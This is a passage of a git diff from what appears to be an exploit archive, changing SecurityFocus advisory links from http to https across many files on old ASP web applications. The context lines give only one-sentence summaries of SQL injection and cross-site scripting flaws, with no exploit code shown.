aeNovoWYSI are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26335.txt b/exploits/asp/webapps/26335.txt index 85976e0a4..c587aca07 100644 --- a/exploits/asp/webapps/26335.txt +++ b/exploits/asp/webapps/26335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15038/info +source: https://www.securityfocus.com/bid/15038/info aeNovo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26351.txt b/exploits/asp/webapps/26351.txt index 7cb0b649e..f1273836e 100644 --- a/exploits/asp/webapps/26351.txt +++ b/exploits/asp/webapps/26351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15118/info +source: https://www.securityfocus.com/bid/15118/info BackOffice Plus is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26426.html b/exploits/asp/webapps/26426.html index 6caabec8d..8f13d7b01 100644 --- a/exploits/asp/webapps/26426.html +++ b/exploits/asp/webapps/26426.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15215/info +source: https://www.securityfocus.com/bid/15215/info Multiple Techno Dreams scripts are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26429.txt b/exploits/asp/webapps/26429.txt index 25021fb94..8a267f5a2 100644 --- a/exploits/asp/webapps/26429.txt +++ b/exploits/asp/webapps/26429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15220/info +source: https://www.securityfocus.com/bid/15220/info ZENworks Patch Management is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26430.txt b/exploits/asp/webapps/26430.txt index 33bd78d29..7b474d721 100644 --- a/exploits/asp/webapps/26430.txt +++ b/exploits/asp/webapps/26430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15220/info +source: https://www.securityfocus.com/bid/15220/info ZENworks Patch Management is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26435.txt b/exploits/asp/webapps/26435.txt index 01af6fef7..03080189d 100644 --- a/exploits/asp/webapps/26435.txt +++ b/exploits/asp/webapps/26435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15233/info +source: https://www.securityfocus.com/bid/15233/info ASP Fast Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26439.txt b/exploits/asp/webapps/26439.txt index b5042e547..c778bafdf 100644 --- a/exploits/asp/webapps/26439.txt +++ b/exploits/asp/webapps/26439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15241/info +source: https://www.securityfocus.com/bid/15241/info Snitz Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26444.txt b/exploits/asp/webapps/26444.txt index bd2eb2b9f..c12844180 100644 --- a/exploits/asp/webapps/26444.txt +++ b/exploits/asp/webapps/26444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15251/info +source: https://www.securityfocus.com/bid/15251/info Comersus BackOfficePlus and BackOfficeLite are prone to multiple input validation and information disclosure vulnerabilities. diff --git a/exploits/asp/webapps/26445.pl b/exploits/asp/webapps/26445.pl index e59806c6f..2819797d1 100755 --- a/exploits/asp/webapps/26445.pl +++ b/exploits/asp/webapps/26445.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15251/info +source: https://www.securityfocus.com/bid/15251/info Comersus BackOfficePlus and BackOfficeLite are prone to multiple input validation and information disclosure vulnerabilities. diff --git a/exploits/asp/webapps/26473.txt b/exploits/asp/webapps/26473.txt index 95d58c187..c64553fa8 100644 --- a/exploits/asp/webapps/26473.txt +++ b/exploits/asp/webapps/26473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15329/info +source: https://www.securityfocus.com/bid/15329/info Ocean12 ASP Calendar Manager is prone to an authentication bypass vulnerability. This is due to to an access validation error in the application. diff --git a/exploits/asp/webapps/26537.html b/exploits/asp/webapps/26537.html index b1a0d7d9c..7f835c955 100644 --- a/exploits/asp/webapps/26537.html +++ b/exploits/asp/webapps/26537.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15490/info +source: https://www.securityfocus.com/bid/15490/info VP-ASP Shopping Cart is prone to an HTML injection vulnerability. This is due to a lack of proper validation of user-supplied input before being used in dynamically generated content. diff --git a/exploits/asp/webapps/26701.txt b/exploits/asp/webapps/26701.txt index 448250f64..608cbe055 100644 --- a/exploits/asp/webapps/26701.txt +++ b/exploits/asp/webapps/26701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15694/info +source: https://www.securityfocus.com/bid/15694/info ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26702.txt b/exploits/asp/webapps/26702.txt index e67a0ce52..c753cd048 100644 --- a/exploits/asp/webapps/26702.txt +++ b/exploits/asp/webapps/26702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15694/info +source: https://www.securityfocus.com/bid/15694/info ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26704.txt b/exploits/asp/webapps/26704.txt index 162d78d3d..2cf08a6a1 100644 --- a/exploits/asp/webapps/26704.txt +++ b/exploits/asp/webapps/26704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15695/info +source: https://www.securityfocus.com/bid/15695/info Solupress News is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26705.txt b/exploits/asp/webapps/26705.txt index 968dbdd36..2f00b7e9c 100644 --- a/exploits/asp/webapps/26705.txt +++ b/exploits/asp/webapps/26705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15697/info +source: https://www.securityfocus.com/bid/15697/info SiteBeater News is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26742.txt b/exploits/asp/webapps/26742.txt index a20cd2681..dbf697636 100644 --- a/exploits/asp/webapps/26742.txt +++ b/exploits/asp/webapps/26742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15731/info +source: https://www.securityfocus.com/bid/15731/info DuPortalPro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26743.txt b/exploits/asp/webapps/26743.txt index d999e51e5..ee71947eb 100644 --- a/exploits/asp/webapps/26743.txt +++ b/exploits/asp/webapps/26743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15734/info +source: https://www.securityfocus.com/bid/15734/info ASPKnowledgeBase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26744.txt b/exploits/asp/webapps/26744.txt index 23d6bbcc4..9065a6b9e 100644 --- a/exploits/asp/webapps/26744.txt +++ b/exploits/asp/webapps/26744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15737/info +source: https://www.securityfocus.com/bid/15737/info NetAuctionHelp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26745.txt b/exploits/asp/webapps/26745.txt index 01e206ac6..50e732967 100644 --- a/exploits/asp/webapps/26745.txt +++ b/exploits/asp/webapps/26745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15740/info +source: https://www.securityfocus.com/bid/15740/info The 'rwAuction Pro' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26746.txt b/exploits/asp/webapps/26746.txt index 21e9d1da2..50be7a502 100644 --- a/exploits/asp/webapps/26746.txt +++ b/exploits/asp/webapps/26746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15741/info +source: https://www.securityfocus.com/bid/15741/info A-FAQ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26747.txt b/exploits/asp/webapps/26747.txt index f143b2c4d..54f6e2578 100644 --- a/exploits/asp/webapps/26747.txt +++ b/exploits/asp/webapps/26747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15741/info +source: https://www.securityfocus.com/bid/15741/info A-FAQ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26759.txt b/exploits/asp/webapps/26759.txt index 04885d7db..9ac893dfe 100644 --- a/exploits/asp/webapps/26759.txt +++ b/exploits/asp/webapps/26759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15767/info +source: https://www.securityfocus.com/bid/15767/info ASPMForum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26760.txt b/exploits/asp/webapps/26760.txt index ac8b580e4..e6ecda894 100644 --- a/exploits/asp/webapps/26760.txt +++ b/exploits/asp/webapps/26760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15767/info +source: https://www.securityfocus.com/bid/15767/info ASPMForum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26777.txt b/exploits/asp/webapps/26777.txt index 39e85fe1d..0af51f484 100644 --- a/exploits/asp/webapps/26777.txt +++ b/exploits/asp/webapps/26777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15812/info +source: https://www.securityfocus.com/bid/15812/info LocazoList Classifieds is prone to an input validation vulnerability that allows cross-site scripting and SQL injection attacks. diff --git a/exploits/asp/webapps/26820.txt b/exploits/asp/webapps/26820.txt index 7f8e5a022..56c92ab19 100644 --- a/exploits/asp/webapps/26820.txt +++ b/exploits/asp/webapps/26820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15858/info +source: https://www.securityfocus.com/bid/15858/info XM Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26821.txt b/exploits/asp/webapps/26821.txt index 5332909b9..0c611f67d 100644 --- a/exploits/asp/webapps/26821.txt +++ b/exploits/asp/webapps/26821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15859/info +source: https://www.securityfocus.com/bid/15859/info ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26822.txt b/exploits/asp/webapps/26822.txt index 437d9fbd6..b8a5f4df3 100644 --- a/exploits/asp/webapps/26822.txt +++ b/exploits/asp/webapps/26822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15859/info +source: https://www.securityfocus.com/bid/15859/info ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26823.txt b/exploits/asp/webapps/26823.txt index 4916e2292..8ef408fff 100644 --- a/exploits/asp/webapps/26823.txt +++ b/exploits/asp/webapps/26823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15859/info +source: https://www.securityfocus.com/bid/15859/info ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26873.txt b/exploits/asp/webapps/26873.txt index 8ec3359b7..7bbc0c776 100644 --- a/exploits/asp/webapps/26873.txt +++ b/exploits/asp/webapps/26873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15933/info +source: https://www.securityfocus.com/bid/15933/info Acidcat CMS is prone to multiple input validation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/asp/webapps/26874.txt b/exploits/asp/webapps/26874.txt index 3a994cff3..52891d4e2 100644 --- a/exploits/asp/webapps/26874.txt +++ b/exploits/asp/webapps/26874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15933/info +source: https://www.securityfocus.com/bid/15933/info Acidcat CMS is prone to multiple input validation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/asp/webapps/26875.txt b/exploits/asp/webapps/26875.txt index de886b754..37f1b63f1 100644 --- a/exploits/asp/webapps/26875.txt +++ b/exploits/asp/webapps/26875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15935/info +source: https://www.securityfocus.com/bid/15935/info Allinta CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26876.txt b/exploits/asp/webapps/26876.txt index 11007a742..f66c95eb3 100644 --- a/exploits/asp/webapps/26876.txt +++ b/exploits/asp/webapps/26876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15935/info +source: https://www.securityfocus.com/bid/15935/info Allinta CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26903.txt b/exploits/asp/webapps/26903.txt index a9ca7f0c9..3a90278f0 100644 --- a/exploits/asp/webapps/26903.txt +++ b/exploits/asp/webapps/26903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15961/info +source: https://www.securityfocus.com/bid/15961/info Baseline CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26926.txt b/exploits/asp/webapps/26926.txt index 09496f7e2..a6094bdad 100644 --- a/exploits/asp/webapps/26926.txt +++ b/exploits/asp/webapps/26926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16008/info +source: https://www.securityfocus.com/bid/16008/info PortalApp is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26927.txt b/exploits/asp/webapps/26927.txt index a7710424f..c33e05cb7 100644 --- a/exploits/asp/webapps/26927.txt +++ b/exploits/asp/webapps/26927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16009/info +source: https://www.securityfocus.com/bid/16009/info SiteEnable is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26928.txt b/exploits/asp/webapps/26928.txt index 1e29a656e..5834ea26e 100644 --- a/exploits/asp/webapps/26928.txt +++ b/exploits/asp/webapps/26928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16010/info +source: https://www.securityfocus.com/bid/16010/info IntranetApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26929.txt b/exploits/asp/webapps/26929.txt index b0813d9ac..f19abaafd 100644 --- a/exploits/asp/webapps/26929.txt +++ b/exploits/asp/webapps/26929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16010/info +source: https://www.securityfocus.com/bid/16010/info IntranetApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26930.txt b/exploits/asp/webapps/26930.txt index 7a5ede03e..7eedbaf51 100644 --- a/exploits/asp/webapps/26930.txt +++ b/exploits/asp/webapps/26930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26931.txt b/exploits/asp/webapps/26931.txt index 2a1af5e76..9d457fe8e 100644 --- a/exploits/asp/webapps/26931.txt +++ b/exploits/asp/webapps/26931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26932.txt b/exploits/asp/webapps/26932.txt index f05a89ba6..33b87289c 100644 --- a/exploits/asp/webapps/26932.txt +++ b/exploits/asp/webapps/26932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26934.txt b/exploits/asp/webapps/26934.txt index e7b185dae..d901ac4d7 100644 --- a/exploits/asp/webapps/26934.txt +++ b/exploits/asp/webapps/26934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26935.txt b/exploits/asp/webapps/26935.txt index 8c27679be..93d9fcb3d 100644 --- a/exploits/asp/webapps/26935.txt +++ b/exploits/asp/webapps/26935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26936.txt b/exploits/asp/webapps/26936.txt index 6d0fbfeb3..db16a6963 100644 --- a/exploits/asp/webapps/26936.txt +++ b/exploits/asp/webapps/26936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26940.txt b/exploits/asp/webapps/26940.txt index 178f0868e..9572d7993 100644 --- a/exploits/asp/webapps/26940.txt +++ b/exploits/asp/webapps/26940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26941.txt b/exploits/asp/webapps/26941.txt index 6be218fd9..f615b92a6 100644 --- a/exploits/asp/webapps/26941.txt +++ b/exploits/asp/webapps/26941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26942.txt b/exploits/asp/webapps/26942.txt index 9a8a78370..879c29c6a 100644 --- a/exploits/asp/webapps/26942.txt +++ b/exploits/asp/webapps/26942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26943.txt b/exploits/asp/webapps/26943.txt index 75c7ed889..a044f5eae 100644 --- a/exploits/asp/webapps/26943.txt +++ b/exploits/asp/webapps/26943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26944.txt b/exploits/asp/webapps/26944.txt index 1a65a5f92..6b45dfb1a 100644 --- a/exploits/asp/webapps/26944.txt +++ b/exploits/asp/webapps/26944.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26945.txt b/exploits/asp/webapps/26945.txt index 9cb46455c..095801960 100644 --- a/exploits/asp/webapps/26945.txt +++ b/exploits/asp/webapps/26945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26946.txt b/exploits/asp/webapps/26946.txt index 84f1a6f11..e24e5a874 100644 --- a/exploits/asp/webapps/26946.txt +++ b/exploits/asp/webapps/26946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26947.txt b/exploits/asp/webapps/26947.txt index f5bc1f2ed..04b8f7faa 100644 --- a/exploits/asp/webapps/26947.txt +++ b/exploits/asp/webapps/26947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16016/info +source: https://www.securityfocus.com/bid/16016/info Sitekit CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26948.txt b/exploits/asp/webapps/26948.txt index deff57250..5b1889fde 100644 --- a/exploits/asp/webapps/26948.txt +++ b/exploits/asp/webapps/26948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16016/info +source: https://www.securityfocus.com/bid/16016/info Sitekit CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26949.txt b/exploits/asp/webapps/26949.txt index 52a64d3ab..500cce844 100644 --- a/exploits/asp/webapps/26949.txt +++ b/exploits/asp/webapps/26949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16016/info +source: https://www.securityfocus.com/bid/16016/info Sitekit CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26963.txt b/exploits/asp/webapps/26963.txt index b3db06ef1..a826468bd 100644 --- a/exploits/asp/webapps/26963.txt +++ b/exploits/asp/webapps/26963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16022/info +source: https://www.securityfocus.com/bid/16022/info QP7.Enterprise is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26964.txt b/exploits/asp/webapps/26964.txt index 8fc99b928..e26858dd6 100644 --- a/exploits/asp/webapps/26964.txt +++ b/exploits/asp/webapps/26964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16022/info +source: https://www.securityfocus.com/bid/16022/info QP7.Enterprise is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26969.txt b/exploits/asp/webapps/26969.txt index 5665dd66f..ace7612cb 100644 --- a/exploits/asp/webapps/26969.txt +++ b/exploits/asp/webapps/26969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16034/info +source: https://www.securityfocus.com/bid/16034/info Tangora Portal CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26991.html b/exploits/asp/webapps/26991.html index be67478b2..638857651 100644 --- a/exploits/asp/webapps/26991.html +++ b/exploits/asp/webapps/26991.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16085/info +source: https://www.securityfocus.com/bid/16085/info Multiple Products by Web Wiz are prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/27034.txt b/exploits/asp/webapps/27034.txt index 71477f498..127b755f7 100644 --- a/exploits/asp/webapps/27034.txt +++ b/exploits/asp/webapps/27034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16155/info +source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27035.txt b/exploits/asp/webapps/27035.txt index c7af7ecfb..da3c974ad 100644 --- a/exploits/asp/webapps/27035.txt +++ b/exploits/asp/webapps/27035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16155/info +source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27036.txt b/exploits/asp/webapps/27036.txt index 71b6cc754..95658229b 100644 --- a/exploits/asp/webapps/27036.txt +++ b/exploits/asp/webapps/27036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16155/info +source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27063.txt b/exploits/asp/webapps/27063.txt index 9eaa450b0..66b344f8b 100644 --- a/exploits/asp/webapps/27063.txt +++ b/exploits/asp/webapps/27063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16196/info +source: https://www.securityfocus.com/bid/16196/info WebWiz Forums is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27071.txt b/exploits/asp/webapps/27071.txt index c6b3e5087..acbc6b1c8 100644 --- a/exploits/asp/webapps/27071.txt +++ b/exploits/asp/webapps/27071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16216/info +source: https://www.securityfocus.com/bid/16216/info FogBugz is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27079.txt b/exploits/asp/webapps/27079.txt index ed01d550d..064309c80 100644 --- a/exploits/asp/webapps/27079.txt +++ b/exploits/asp/webapps/27079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16234/info +source: https://www.securityfocus.com/bid/16234/info Helm is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27083.txt b/exploits/asp/webapps/27083.txt index 1625e8355..38005c4b1 100644 --- a/exploits/asp/webapps/27083.txt +++ b/exploits/asp/webapps/27083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16243/info +source: https://www.securityfocus.com/bid/16243/info SimpleBlog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27142.txt b/exploits/asp/webapps/27142.txt index e4a89fd45..9b0f1825c 100644 --- a/exploits/asp/webapps/27142.txt +++ b/exploits/asp/webapps/27142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16404/info +source: https://www.securityfocus.com/bid/16404/info ASPThai Forums is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27143.txt b/exploits/asp/webapps/27143.txt index 9c314b3b4..c371ddd8b 100644 --- a/exploits/asp/webapps/27143.txt +++ b/exploits/asp/webapps/27143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16406/info +source: https://www.securityfocus.com/bid/16406/info ZixForum is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27151.txt b/exploits/asp/webapps/27151.txt index 030022a8e..40e7d8b7e 100644 --- a/exploits/asp/webapps/27151.txt +++ b/exploits/asp/webapps/27151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16433/info +source: https://www.securityfocus.com/bid/16433/info Daffodil CRM is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27160.txt b/exploits/asp/webapps/27160.txt index ba7cf20eb..117af4403 100644 --- a/exploits/asp/webapps/27160.txt +++ b/exploits/asp/webapps/27160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16471/info +source: https://www.securityfocus.com/bid/16471/info SoftMaker Shop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/asp/webapps/27161.txt b/exploits/asp/webapps/27161.txt index 32b9544bb..c8de82c26 100644 --- a/exploits/asp/webapps/27161.txt +++ b/exploits/asp/webapps/27161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16473/info +source: https://www.securityfocus.com/bid/16473/info CyberShop Ultimate E-commerce is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27169.txt b/exploits/asp/webapps/27169.txt index 2baa7bed3..86a9774a0 100644 --- 